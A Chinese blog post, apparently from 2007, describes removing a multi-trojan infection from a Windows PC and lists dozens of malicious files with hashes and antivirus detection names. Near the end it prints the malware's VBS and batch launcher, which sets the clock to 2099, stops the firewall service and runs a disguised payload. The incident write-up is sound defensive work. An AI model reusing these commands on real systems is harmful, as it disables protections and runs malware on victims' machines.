首页 > 其他分享 >遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等3

遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等3

时间:2022-11-23 18:08:10浏览次数:53  
标签:lg 12 文件 WINDOWS 30 Win32 Backdoor exe 2005


endurer 原创
2007-06-22 第1

由于病毒进程存在,而且会自动运行IE打开利用系统漏洞传播的网页,所以将IE设置为脱机工作。

然后先卸掉中文上网,雅虎助手。

用WinRAR删除C,D,E,F盘上的autorun.inf和病毒程序文件folder.exe,IO.pif,rising.exe、myplayer.com等。

autorun.inf刚删除又被再生了~,用bat_do 延时删除和下次启动时执行删除命令。

用FileInfo 提取病毒程序和可疑程序文件信息,用 bat_do 打包,删除,删除不了的,用延迟删除和下次启动时执行删除命令。

用几个病毒文件,如C:/WINDOWS/org.exe, 会拒绝访问,用 IceSword 复制后再打包。

用 HijackThis 修复浏览器,删除 病毒程序和可疑程序系的开机启动项,F2, O2——O23。

发现

O2 - BHO Info cache - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} - C:/Documents and Settings/All Users/Application Data/Microsoft/PCTools/pctools.dll

居然修复不了。

下载安装瑞星卡卡安全助手,扫描出7,8个流氓软件,清除。

再把在插件管理里把O2等项禁用、卸载了。

到注册表删除病毒程序和可疑程序的系统服务启动项,O23,O25。

病毒文件太多,只贴其中一部分信息:

文件说明符 : C:/WINDOWS/system32/kernl32.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 119296 字节 116.512 KB
MD5 : 799d1a116fe960978943513534413776

Kaspersky 报为 Trojan-Spy.Win32.Delf.lv,瑞星报为  Adware.Delf.l

文件说明符 : D:/folder.exe
属性 : --H-
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:16:18
修改时间 : 2099-12-30 1:15:54
访问时间 : 2005-12-30 0:0:0
大小 : 12288 字节 12.0 KB
MD5 : fd8cb701c602f2a114fc7b8892d3aff7

瑞星报为 Trojan.DL.Win32.Mach.z

文件说明符 : D:/rising.exe
属性 : --H-
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2005-6-18 22:49:6
修改时间 : 2005-6-18 22:49:6
访问时间 : 2005-12-31 0:0:0
大小 : 19076 字节 18.644 KB
MD5 : e4eeb18c9cf0324311a0db72868e5006

瑞星报为 Trojan.DL.Win32.Agent.al

文件说明符 : D:/myplayer.com属性 : -SHR
获取文件版本信息大小失败!
创建时间 : 2005-12-30 22:50:57
修改时间 : 2005-12-30 22:50:38
访问时间 : 2005-12-31 0:0:0
大小 : 94828 字节 92.620 KB
MD5 : 58e6ba5e8ff3ec1c051d13b43bdc6ebf

Kaspersky 报为 Trojan-Spy.Win32.Agent.pn,瑞星报为 Trojan.DL.Win32.Mnless.c

文件说明符 : C:/WINDOWS/system32/216.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-11 11:5:33
修改时间 : 2005-6-11 11:5:34
访问时间 : 2005-12-30 0:0:0
大小 : 8704 字节 8.512 KB
MD5 : 2ef6779f9187ddfeaf56f2b95382ed50

文件说明符 : C:/WINDOWS/system32/wintemp.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-13 11:53:20
修改时间 : 2005-6-13 11:53:20
访问时间 : 2005-12-30 0:0:0
大小 : 14848 字节 14.512 KB
MD5 : 9cea357d1001a82e7778ec0048f7a909

Kaspersky报为 Trojan-PSW.Win32.Nilage.bfc,瑞星报为 Backdoor.Pina.r

文件说明符 : C:/WINDOWS/system32/Rem.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 193536 字节 189.0 KB
MD5 : 9517a5e1d7928496c34af86455b17bd5

Kaspersky 报为 Trojan-PSW.Win32.QQRob.lg

文件说明符 : C:/WINDOWS/system32/xiaobo.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 127650 字节 124.674 KB
MD5 : edbde7a3de397a83a9e7029eef85f073

文件说明符 : C:/WINDOWS/system32/xiaobo.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 160256 字节 156.512 KB
MD5 : 0a95795e4aa7a76e082342f9a94fe762

瑞星报为 Backdoor.Gpigeon.2007.ca

文件说明符 : C:/WINDOWS/system32/wljs0001.3322.org.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-18 22:49:43
修改时间 : 2005-12-30 1:43:32
访问时间 : 2005-12-30 0:0:0
大小 : 29184 字节 28.512 KB
MD5 : cf55ab85f0a21bcb6a2d771f71e85ffd

文件说明符 : C:/WINDOWS/system32/wljs0001.3322.org.dll
属性 : ----
语言 : 中文(中国)
文件版本 : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Microsoft? Windows? Operating System
版权 : Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.1.2600.2180
产品名称 : Microsoft? Windows? Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : VipDll
源文件名 : msgsvc4.dll
创建时间 : 2007-6-20 9:41:3
修改时间 : 2005-12-30 22:50:18
访问时间 : 2007-6-20 0:0:0
大小 : 23552 字节 23.0 KB
MD5 : 83a01df54559aa55c9495e058de60b4c

瑞星报为 Trojan.DL.Win32.Agent.u

文件说明符 : C:/WINDOWS/SknNQ.exe
属性 : --H-
获取文件版本信息大小失败!
创建时间 : 2005-6-10 16:33:13
修改时间 : 2005-6-9 14:34:0
访问时间 : 2005-12-31 0:0:0
大小 : 52224 字节 51.0 KB
MD5 : 4b369ff1b764ad59e9053983abc74e24

Kaspersky 报为 Worm.Win32.Agent.t,瑞星报为 Worm.Autorun.d

C:/WINDOWS/gpKrF.exe 与 C:/WINDOWS/SknNQ.exe相同。

文件说明符 : C:/WINDOWS/system32/dix.dll
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-6-20 23:35:25
修改时间 : 2005-12-30 1:16:6
访问时间 : 2007-6-20 0:0:0
大小 : 9216 字节 9.0 KB
MD5 : 3c2fe2295fd840d3617cb4b0765b9d63

Kaspersky 报为 Trojan-Downloader.Win32.Tiny.hf,瑞星报为 Worm.Agent.uo

文件说明符 : C:/temp/svchost.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2099-12-30 1:20:5
修改时间 : 2099-12-30 1:19:40
访问时间 : 2005-12-30 0:0:0
大小 : 181760 字节 177.512 KB
MD5 : c89d3cb8ac1cbf05fcbbbe65ad2bca79

瑞星报为 Trojan.Mnless.mhj

C:/WINDOWS/system32/11358782719.exe 与 C:/temp/svchost.exe 相同。

文件说明符 : C:/WINDOWS/svchost.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 41472 字节 40.512 KB
MD5 : 3f83ba45ce7d231a25dd47148244201fa

Kaspersky 报为 Trojan-Spy.Win32.Delf.lv,瑞星报为  Backdoor.Win32.Agent.bcn

文件说明符 : C:/WINDOWS/system32/SVCH0ST.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:16:7
修改时间 : 2099-12-30 1:43:8
访问时间 : 2005-12-30 0:0:0
大小 : 19456 字节 19.0 KB
MD5 : 55fffbfbdb128eec945e6449158b5c5f

Kaspersky 报为 Backdoor.Win32.Agent.fs

文件说明符 : C:/Program Files/Common Files/Services/svchost.exe
属性 : -SH-
获取文件版本信息大小失败!
创建时间 : 2099-12-30 22:51:37
修改时间 : 2005-6-18 22:49:18
访问时间 : 2005-12-31 0:0:0
大小 : 18944 字节 18.512 KB
MD5 : c3c2c397f2072fa42bc66f2a844b1e60

瑞星报为 Worm.Delf.yrj

C:/WINDOWS/system32/k11359628572.exeC:/WINDOWS/system32/k-1927180042.exeD:/IO.pif 与 C:/WINDOWS/system32/k11359628572.exe 相同。

文件说明符 : C:/WINDOWS/org.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 21:36:25
修改时间 : 2005-12-30 21:36:26
访问时间 : 2005-12-30 0:0:0
大小 : 411648 字节 402.0 KB
MD5 : 117164cc5b870ce785a58eff4ee163a4

文件说明符 : C:/WINDOWS/system32/2DD519ED.EXE
属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2005-6-18 22:49:25
修改时间 : 2007-6-16 6:27:26
访问时间 : 2005-12-30 0:0:0
大小 : 19815 字节 19.359 KB
MD5 : a4e72f11260bdea65673f1715bc14542

文件说明符 : C:/Program Files/Internet Explorer/SPLOUE.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2099-12-30 1:22:35
修改时间 : 2099-12-30 1:20:16
访问时间 : 2005-12-30 0:0:0
大小 : 62464 字节 61.0 KB
MD5 : 47e1d83f4fe2ab720c91ad4793116304

Kaspersky 报为 Trojan-Downloader.Win32.Delf.blx,瑞星报为  Trojan.DL.Delf.yqz

C:/WINDOWS/system32/113587827410.exeC:/WINDOWS/system32/-19271928710.exeC:/Program Files/Internet Explorer/SPLOUE.exe 相同。

文件说明符 : C:/WINDOWS/system32/syssbyou2.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2099-12-30 22:52:52
修改时间 : 2099-12-30 1:42:54
访问时间 : 2005-12-30 0:0:0
大小 : 24576 字节 24.0 KB
MD5 : 05ce793d1f2531b07cb97399cfaa5b1e

文件说明符 : C:/WINDOWS/system32/75D23BE4.EXE属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2005-6-18 22:49:19
修改时间 : 2099-12-30 1:43:2
访问时间 : 2005-12-30 0:0:0
大小 : 17817 字节 17.409 KB
MD5 : f5f0c6f0e2d07a8f2ecf84a301b7ec55

文件说明符 : C:/WINDOWS/system32/F77B20D5.EXE
属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2005-12-30 22:51:2
修改时间 : 2005-12-30 22:51:2
访问时间 : 2005-12-30 0:0:0
大小 : 16641 字节 16.257 KB
MD5 : 5cd6cc21a3db3aef387e7c7fc3354943

文件说明符 : C:/WINDOWS/system32/269775.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 23:12:50
修改时间 : 2005-12-30 23:12:46
访问时间 : 2005-12-30 0:0:0
大小 : 27648 字节 27.0 KB
MD5 : 4b2e3ff4f848c40f58905b6776560df6

文件说明符 : C:/Program Files/Internet Explorer/PLUGINS/149373.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 22:50:37
修改时间 : 2005-12-30 22:50:42
访问时间 : 2005-12-31 0:0:0
大小 : 108194 字节 105.674 KB
MD5 : aa8066099e563eb6a88a1486427421a2

瑞星报为 Trojan.DL.Mnless.aol

C:/Program Files/Internet Explorer/PLUGINS/801854.exeC:/WINDOWS/system32/k-1927180051.exeC:/WINDOWS/system32/k11359628561.exe 与  C:/Program Files/Internet Explorer/PLUGINS/149373.exe 相同。

文件说明符 : C:/WINDOWS/system32/k11359628625.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-31 1:14:23
修改时间 : 2005-12-31 1:14:26
访问时间 : 2005-12-30 0:0:0
大小 : 148364 字节 144.908 KB
MD5 : b3575acc190457e48e44e3d60253cad4

Kaspersky 报为 》IEXPLORE.EXE___Packed.Win32.Klone.af,瑞星报为  Trojan.DL.AdLoad.aso

C:/Program Files/Internet Explorer/PLUGINS/281408.exeC:/Program Files/Internet Explorer/PLUGINS/289228.exeC:/WINDOWS/system32/k-1927179955.exe 与 C:/WINDOWS/system32/k11359628625.exe 相同。

文件说明符 : C:/WINDOWS/system32/24E9F3BC.EXE
属性 : A-H-
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2005-6-18 22:49:5
修改时间 : 2005-12-30 1:42:12
访问时间 : 2005-12-30 0:0:0
大小 : 19178 字节 18.746 KB
MD5 : 442724d5a639473cc75cfb522a88685c

文件说明符 : C:/WINDOWS/system32/11358781883.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:43:11
修改时间 : 2005-12-30 1:43:14
访问时间 : 2005-12-30 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : 11d8dd950781b878c8796b9a94fc1fac

文件说明符 : C:/WINDOWS/system32/11358782677.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:44:27
修改时间 : 2005-12-30 1:44:28
访问时间 : 2005-12-30 0:0:0
大小 : 24576 字节 24.0 KB
MD5 : 6a06d4410fb36321214eebf43ac8b0de

C:/WINDOWS/system32/-1927193767.exe 与 C:/WINDOWS/system32/11358782677.exe 相同。

文件说明符 : C:/WINDOWS/system32/11358782688.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:44:29
修改时间 : 2005-12-30 1:44:30
访问时间 : 2005-12-30 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : a7ce31c5e21356c5f8b12f89748a3803

文件说明符 : C:/WINDOWS/system32/-1927195472.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:15:55
修改时间 : 2005-12-30 1:16:0
访问时间 : 2005-12-30 0:0:0
大小 : 24576 字节 24.0 KB
MD5 : 9ea88f6b640af59ed965771a7c86bfde

文件说明符 : C:/WINDOWS/system32/17gmPDigg.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 22:51:11
修改时间 : 2005-12-30 1:43:24
访问时间 : 2005-12-30 0:0:0
大小 : 33 字节
MD5 : a533c76b45904adffeb83ff3f1bb47d4

文件说明符 : C:/WINDOWS/system32/syssbyou1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 1:41:59
修改时间 : 2005-12-30 1:42:4
访问时间 : 2005-12-30 0:0:0
大小 : 138240 字节 135.0 KB
MD5 : f851f58085b7afac2dff991c4266b7d1

文件说明符 : C:/WINDOWS/system32/syssbyou3.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2099-12-30 22:53:12
修改时间 : 2005-12-30 1:43:12
访问时间 : 2005-12-30 0:0:0
大小 : 4637 字节 4.541 KB
MD5 : 399e122fcc1bd0c35e463da9621377c7

文件说明符 : C:/WINDOWS/system32/syssbyou4.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2099-12-30 22:53:21
修改时间 : 2005-12-30 1:43:30
访问时间 : 2005-12-30 0:0:0
大小 : 4637 字节 4.541 KB
MD5 : 140689a4a442334f257f611e2097bd70

文件说明符 : C:/WINDOWS/system32/autoc0nv.exe
属性 : --H-
获取文件版本信息大小失败!
创建时间 : 2005-6-10 15:55:32
修改时间 : 2005-6-10 15:55:34
访问时间 : 2005-12-30 0:0:0
大小 : 24576 字节 24.0 KB
MD5 : d89031281b968c96723bf6bcb90838cc

Kaspersky 报为 Trojan.Win32.Agent.ajr,瑞星报为 Trojan.Clicker.Agent.bjd

C:/WINDOWS/215.exe 与 C:/WINDOWS/system32/autoc0nv.exe 相同。

文件说明符 : C:/Program Files/Common Files/system/Updaterun.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 7168 字节 7.0 KB
MD5 : 3e1fe4f215eeed83a5dbce88d96b9d54
 
Kaspersky 报为 Trojan-Downloader.Win32.Agent.bdn,瑞星报为  Trojan.Win32.Agent.ak

文件说明符 : C:/WINDOWS/system32/216.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-11 11:5:33
修改时间 : 2005-6-11 11:5:34
访问时间 : 2005-12-30 0:0:0
大小 : 8704 字节 8.512 KB
MD5 : 2ef6779f9187ddfeaf56f2b95382ed50

文件说明符 : C:/WINDOWS/system32/wintemp.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-13 11:53:20
修改时间 : 2005-6-13 11:53:20
访问时间 : 2005-12-30 0:0:0
大小 : 14848 字节 14.512 KB
MD5 : 9cea357d1001a82e7778ec0048f7a909

文件说明符 : C:/WINDOWS/system32/drivers/gjk0.sys
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 33212 字节 32.444 KB
MD5 : 297b2a1d4a1189c8c676b4c1984314ea

文件说明符 : C:/WINDOWS/system32/vwdht.dll
属性 : A---
语言 : 语言中性
文件版本 : 5.1.2600.0
说明 : szdj
版权 : Copyright (C) Microsoft Corporation 1990-2000
备注 :
产品版本 : 5.1.2600.0
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : szdj
源文件名 : szdj.dll
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 239616 字节 234.0 KB
MD5 : f488d9cd9a595d4d7f6de0b207527eeb

Kaspersky 报为 Trojan-Downloader.Win32.QQHelper.vd,瑞星报为  Trojan.DL.Win32.QQHelper.h

文件说明符 : C:/PROGRA~1/evah/ofkr.dll
属性 : A---
语言 : 中文(中国)
文件版本 : 5, 0, 0, 4
说明 : AdDm
版权 : Copyright ? 2006
备注 :
产品版本 : 5, 0, 0, 4
产品名称 :   AdDm
公司名称 : 
合法商标 :
内部名称 : AdDm
源文件名 : AdDm.exe
创建时间 : 2099-12-30 1:18:31
修改时间 : 2099-12-30 1:18:34
访问时间 : 2005-12-30 0:0:0
大小 : 131072 字节 128.0 KB
MD5 : 8230b23bd3e183029df539406ec5e8f8

Kaspersky 报为 not-a-virus:AdWare.Win32.Boran.ah,瑞星报为  Adware.Winsdup.c
 

文件说明符 : C:/Program Files/Common Files/kim
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2005-6-11 22:12:22
修改时间 : 2005-6-11 22:12:6
访问时间 : 2005-12-30 0:0:0
大小 : 249862 字节 244.6 KB
MD5 : b0979867ac99a66048dcc60c72543525

文件说明符 : C:/WINDOWS/system32/kusn33sd.exe
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-20 13:44:2
修改时间 : 2005-12-30 22:50:30
访问时间 : 2007-6-20 0:0:0
大小 : 43313 字节 42.305 KB
MD5 : 8c022c5beb426626ef5a8f7a435f2a27

Kaspersky 报为 Backdoor.Win32.Agent.ahj

文件说明符 : C:/WINDOWS/system32/kusn433sd3.dll
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-20 13:39:59
修改时间 : 2005-12-30 21:3:56
访问时间 : 2007-6-20 0:0:0
大小 : 37323 字节 36.459 KB
MD5 : abbc7de38b3b9bcbf9d291982178d0f7

Kaspersky 报为 Backdoor.Win32.Agent.ahj

文件说明符 : C:/WINDOWS/system32/SCardSer.exe
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2001-9-17 17:48:48
修改时间 : 2001-9-17 17:48:48
访问时间 : 2005-12-30 0:0:0
大小 : 4096 字节 4.0 KB
MD5 : 673fcb53b441576073c8266922286ec2

文件说明符 : C:/WINDOWS/SYSTEM32/WBEM/QZOOF.DLL
属性 : A---
语言 : 中文(中国)
文件版本 : 5, 1, 2600, 2709
说明 : Microsoft irJIT Module
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5, 1, 2600, 2709
产品名称 : irJIT
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : IRJIT
源文件名 : IRJIT.dll
创建时间 : 2004-8-17 12:0:0
修改时间 : 2004-8-17 12:0:0
访问时间 : 2005-12-30 0:0:0
大小 : 253952 字节 248.0 KB
MD5 : ca8cde96286ab0ddf5b166a1a7e05f0e

Kaspersky 报为 Trojan-Downloader.Win32.QQHelper.vl,瑞星报为  Trojan.DL.Win32.QQHelper.g

C:/WINDOWS/SYSTEM32/WBEM/XGBIR.DLL 与 C:/WINDOWS/SYSTEM32/WBEM/QZOOF.DLL 相同。

文件说明符 : C:/WINDOWS/system32/ba71.dll
属性 : ---R
语言 : 中文(中国)
文件版本 : 1.0.0.1
说明 : TODO: <文件说明>
版权 : TODO: (C) <公司名>。保留所有权利。
备注 :
产品版本 : 1.0.0.1
产品名称 : TODO: <产品名>
公司名称 : TODO: <公司名>
合法商标 :
内部名称 : dbho.dll
源文件名 : dbho.dll
创建时间 : 2001-2-3 23:7:58
修改时间 : 2001-2-3 23:8:0
访问时间 : 2007-6-19 0:0:0
大小 : 126976 字节 124.0 KB
MD5 : 9f8fe3c9ff9a3248427d60116ce754ee

文件说明符 : C:/Documents and Settings/All Users/Application Data/Microsoft/PCTools/pctools.dll
属性 : ---R
语言 : 英语(美国)
文件版本 : 2, 3, 0, 0
说明 : Pctools Module
版权 : Copyright 2006
备注 :
产品版本 : 2, 3, 0, 0
产品名称 : Pctools Module
公司名称 : 金泰丰(广州)科技有限公司
合法商标 :
内部名称 : pctools
源文件名 : pctools.DLL
创建时间 : 2007-5-10 18:17:42
修改时间 : 2007-5-10 18:17:42
访问时间 : 2007-6-19 0:0:0
大小 : 151552 字节 148.0 KB
MD5 : 70de0e2a03f146c27b48488a8480a08a

文件说明符 : C:/WINDOWS/system32/winsys32_070616.dll
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-6-20 9:49:53
修改时间 : 2005-12-30 21:5:38
访问时间 : 2007-6-20 0:0:0
大小 : 178176 字节 174.0 KB
MD5 : 3fbd7afd572a944f8b30e8853d7a17cc

Kaspersky 报为 Trojan-Spy.Win32.Agent.pn,瑞星报为 Trojan.DL.Win32.Mnless.c

文件说明符 : c:/WINDOWS/11191061761.exe
属性 : --H-
获取文件版本信息大小失败!
创建时间 : 2005-6-18 22:49:43
修改时间 : 2005-6-18 22:49:42
访问时间 : 2005-12-30 0:0:0
大小 : 52224 字节 51.0 KB
MD5 : ff5e990f25523c417e18cd3af8fa12e1

瑞星报为 Worm.Win32.Agent.uw

文件说明符 : C:/WINDOWS/system32/winsys16_070616.dll
属性 : -SHR
获取文件版本信息大小失败!
创建时间 : 2005-12-30 22:51:10
修改时间 : 2005-12-30 22:51:12
访问时间 : 2005-12-30 0:0:0
大小 : 25088 字节 24.512 KB
MD5 : cc5cd86a4d7ae366aecb264d70e1ee21

Kaspersky 报为 Trojan-Spy.Win32.Agent.pn,瑞星报为 Trojan.DL.Win32.Mnless.c

文件说明符 : C:/Program Files/Common Files/Down(1).exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2005-6-17 20:6:48
修改时间 : 2005-6-17 20:8:12
访问时间 : 2005-12-31 0:0:0
大小 : 193536 字节 189.0 KB
MD5 : 9517a5e1d7928496c34af86455b17bd5

Kaspersky 报为 Trojan-PSW.Win32.QQRob.lg

文件说明符 : C:/WINDOWS/IEXPLORE.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-18 22:49:29
修改时间 : 2007-6-3 21:40:12
访问时间 : 2005-12-31 0:0:0
大小 : 55808 字节 54.512 KB
MD5 : f917de8969650e77044201053583c0de

Kaspersky 报为 Packed.Win32.Klone.af,瑞星报为 Trojan.DL.AdLoad.aso

C:/WINDOWS/W1NL0GON.EXE 与 C:/WINDOWS/IEXPLORE.EXE 相同。

c:/windows/2.vbs 内容为:
/---
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C  %systemroot%/2.bat", 0, TRUE)
---/

c:/windows/2.bat 内容为:
/---
set date=%date%
date 2099-12-30
@echo off & setlocal enableextensions
echo WScript.Sleep 1500 > %systemroot%./tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %systemroot%./tmp$$$.vbs
goto Timeout
goto End
:Next
net stop sharedaccess
%systemroot%/IEXPLORE.EXE
copy %systemroot%/tmp.SCR %systemroot%/system32/
for %%f in (%systemroot%./tmp$$$.vbs*) do del %%f
date %date%
---/

c:/windows/tmp$$$.vbs 内容为:
/---
WScript.Sleep 1500
---/

文件说明符 : C:/Program Files/Internet Explorer/PLUGINS/326250.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 23:12:43
修改时间 : 2005-12-30 23:12:44
访问时间 : 2005-12-31 0:0:0
大小 : 168444 字节 164.508 KB
MD5 : 1e829c7e7d2a9ae0d88bcb76fd35ee89

C:/Program Files/Internet Explorer/PLUGINS/439972.exe 与 C:/Program Files/Internet Explorer/PLUGINS/326250.exe 相同。

文件说明符 : C:/Program Files/Internet Explorer/PLUGINS/784375.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 23:12:44
修改时间 : 2005-12-30 23:12:46
访问时间 : 2005-12-31 0:0:0
大小 : 115948 字节 113.236 KB
MD5 : 384dc5b81a52469400c27955540d5381

回收站图标,瑞星报为 》alexa078~.exe___Trojan.DL.Win32.Agent.al

C:/Program Files/Internet Explorer/PLUGINS/912871.exe 与 C:/Program Files/Internet Explorer/PLUGINS/784375.exe 相同

文件说明符 : C:/Program Files/Internet Explorer/PLUGINS/805474.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-12-30 23:12:42
修改时间 : 2005-12-30 23:12:44
访问时间 : 2005-12-31 0:0:0
大小 : 15360 字节 15.0 KB
MD5 : 33aa98709e38b0f6cc6ebd98f5a2b57a

Kaspersky 报为 Trojan-Downloader.Win32.VB.auq,瑞星报为 Trojan.DL.VB.nwq

C:/Program Files/Internet Explorer/PLUGINS/862195.exe 与 C:/Program Files/Internet Explorer/PLUGINS/805474.exe 相同。

文件说明符 : C:/WINDOWS/433.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-13 11:52:52
修改时间 : 2005-6-13 11:53:8
访问时间 : 2005-12-31 0:0:0
大小 : 93184 字节 91.0 KB
MD5 : 7b72a570638837c48d57d6b961ffa2ae

Kaspersky 报为 Trojan-Spy.Win32.Delf.lv,瑞星报为 Backdoor.Win32.Jusi.a

文件说明符 : C:/WINDOWS/218.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-13 11:53:25
修改时间 : 2005-6-13 11:53:28
访问时间 : 2005-12-31 0:0:0
大小 : 10240 字节 10.0 KB
MD5 : 2f6e3853f9132fda291868b4b9467512

Kaspersky 报为 Backdoor.Win32.Agent.apu,瑞星报为 Trojan.Win32.Agent.b

文件说明符 : C:/WINDOWS/G_Server1.23.exe
属性 : -SHR
获取文件版本信息大小失败!
创建时间 : 2005-6-14 16:4:3
修改时间 : 2005-6-14 16:4:2
访问时间 : 2005-12-31 0:0:0
大小 : 264704 字节 258.512 KB
MD5 : c4377b8bf1c02ba4a0ba4ca82a240da5

文件说明符 : C:/WINDOWS/426.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2005-6-16 12:9:12
修改时间 : 2005-6-16 12:9:14
访问时间 : 2005-12-31 0:0:0
大小 : 11325 字节 11.61 KB
MD5 : 230499fd32020fc6bb7da1ec8001ffdd

瑞星报为 Trojan.DL.Win32.Agent.al

文件说明符 : C:/WINDOWS/Down(0).exe
属性 : A---
